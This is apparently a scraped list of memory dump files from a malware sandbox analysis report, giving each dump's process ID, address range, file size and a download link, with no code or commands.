memory/3944-156-0x0000000000000000-mapping.dmp

Download
memory/4048-137-0x00000000066A0000-0x00000000066D2000-memory.dmp

Filesize
200KB

Download
memory/4048-132-0x00000000053E0000-0x0000000005A08000-memory.dmp

Filesize
6.2MB

Download
memory/4048-134-0x0000000005A10000-0x0000000005A76000-memory.dmp

Filesize
408KB

Download
memory/4048-144-0x0000000007600000-0x000000000760E000-memory.dmp

Filesize
56KB

Download
memory/4048-146-0x00000000076F0000-0x00000000076F8000-memory.dmp

Filesize
32KB

Download
memory/4048-135-0x0000000005AF0000-0x0000000005B56000-memory.dmp

Filesize
408KB

Download
memory/4048-143-0x0000000007650000-0x00000000076E6000-memory.dmp

Filesize
600KB

Download
memory/4048-130-0x0000000000000000-mapping.dmp

Download
memory/4048-136-0x00000000060D0000-0x00000000060EE000-memory.dmp

Filesize
120KB

Download
memory/4048-133-0x0000000005220000-0x0000000005242000-memory.dmp

Filesize
136KB

Download
memory/4048-145-0x0000000007710000-0x000000000772A000-memory.dmp

Filesize
104KB

Download
memory/4048-138-0x000000006F0E0000-0x000000006F12C000-memory.dmp

Filesize
304KB

Download
memory/4048-131-0x0000000002C40000-0x0000000002C76000-memory.dmp

Filesize
216KB

Download
memory/4048-142-0x0000000007440000-0x000000000744A000-memory.dmp

Filesize
40KB

Download
memory/4048-139-0x0000000006660000-0x000000000667E000-memory.dmp

Filesize
120KB

Download
memory/4048-140-0x0000000007A10000-0x000000000808A000-memory.dmp

Filesize
6.5MB

Download
memory/4048-141-0x00000000073D0000-0x00000000073EA000-memory.dmp

Filesize
104KB

Download
memory/4196-172-0x0000000000000000-mapping.dmp

Download
memory/4236-157-0x0000000000000000-mapping.dmp

Download
memory/4236-186-0x0000000000000000-mapping.dmp

Download
memory/4444-184-0x0000000000000000-mapping.dmp

Download
memory/4460-241-0x0000000000000000-mapping.dmp

Download
memory/4480-174-0x0000000000000000-mapping.dmp

Download
memory/4480-214-0x0000000000000000-mapping.dmp

Download
memory/4516-201-0x0000000000000000-mapping.dmp

Download
memory/4696-147-0x0000000000000000-mapping.dmp

Download
memory/4696-248-0x0000000000000000-mapping.dmp

Download
memory/4712-171-0x0000000000000000-mapping.dmp

Download
memory/4716-236-0x0000000000000000-mapping.dmp

Download
memory/4892-166-0x0000000000000000-mapping.dmp

Download
memory/4952-159-0x0000000000000000-mapping.dmp

Download
memory/4972-177-0x0000000000000000-mapping.dmp

Download
memory/4992-149-0x0000000000000000-mapping.dmp

Download
memory/5048-161-0x0000000000000000-mapping.dmp

Download
memory/5084-227-0x0000000000000000-mapping.dmp

Download
memory/5084-253-0x0000000000000000-mapping.dmp

Download
memory/5092-217-0x0000000000000000-mapping.dmp

Download
memory/5116-226-0x0000000000000000-mapping.dmp

Download